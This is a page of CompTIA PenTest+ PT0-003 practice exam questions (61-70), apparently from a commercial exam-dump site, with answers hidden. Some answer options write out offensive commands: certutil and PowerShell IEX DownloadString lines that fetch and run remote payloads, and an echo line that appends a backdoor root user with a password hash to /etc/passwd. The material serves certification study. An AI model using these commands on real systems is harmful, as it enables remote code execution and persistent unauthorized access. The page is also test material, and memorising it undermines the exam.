Month End Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 7 out of 9 pages
Viewing questions 61-70 out of questions
Questions # 61:

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1


B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe


C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/ ")


D.

rundll32.exe c:\path\foo.dll,functName


Expert Solution
Questions # 62:

During an assessment, a penetration tester obtains access to an internal server and would like to perform further reconnaissance by capturing LLMNR traffic. Which of the following tools should the tester use?

Options:

A.

Burp Suite


B.

Netcat


C.

Responder


D.

Nmap


Expert Solution
Questions # 63:

A company that uses an insecure corporate wireless network is concerned about security. Which of the following is the most likely tool a penetration tester could use to obtain initial access?

Options:

A.

Responder


B.

Metasploit


C.

Netcat


D.

Nmap


Expert Solution
Questions # 64:

A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resources have been blocked by the company's WAF. Which of the following is the best way to avoid the WAF and gather information about the target company's systems?

Options:

A.

HTML scraping


B.

Code repository scanning


C.

Directory enumeration


D.

Port scanning


Expert Solution
Questions # 65:

While conducting OSINT, a penetration tester discovers the client's administrator posted part of an unsanitized firewall configuration to a troubleshooting message board. Which of the following did the penetration tester most likely use?

Options:

A.

HTML scraping


B.

Public code repository scanning


C.

Wayback Machine


D.

Search engine enumeration


Expert Solution
Questions # 66:

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?

Options:

A.

Read-only


B.

Domain administrator


C.

Local user


D.

Root


Expert Solution
Questions # 67:

openssl passwd password

$1$OjxLvZ85$Fdr51vn/Z4zXWsQR/Xrj.

The tester then adds the following line to the world-writable script:

echo 'root2:$1$0jxLvZ85$Fdr51vn/Z4zXWsQR/Xrj .: 1001:1001:,,,:/root:/bin/bash">> /etc/passwd

Which of the following should the penetration tester do to enable this exploit to work correctly?

Options:

A.

Use only a single redirect to /etc/password.


B.

Generate the password using md5sum.


C.

Log in to the host using SSH.


D.

Change the 1001 entries to 0.


Expert Solution
Questions # 68:

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Options:

A.

route.exe print


B.

netstat.exe -ntp


C.

net.exe commands


D.

strings.exe -a


Expert Solution
Questions # 69:

During an engagement, a penetration tester wants to enumerate users from Linux systems by using finger and rwho commands. However, the tester realizes these commands alone will not achieve the desired result. Which of the following is the best tool to use for this task?

Options:

A.

Nikto


B.

Burp Suite


C.

smbclient


D.

theHarvester


Expert Solution
Questions # 70:

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration


B.

URL spidering


C.

HTML scraping


D.

DoS attack


Expert Solution
Viewing page 7 out of 9 pages
Viewing questions 61-70 out of questions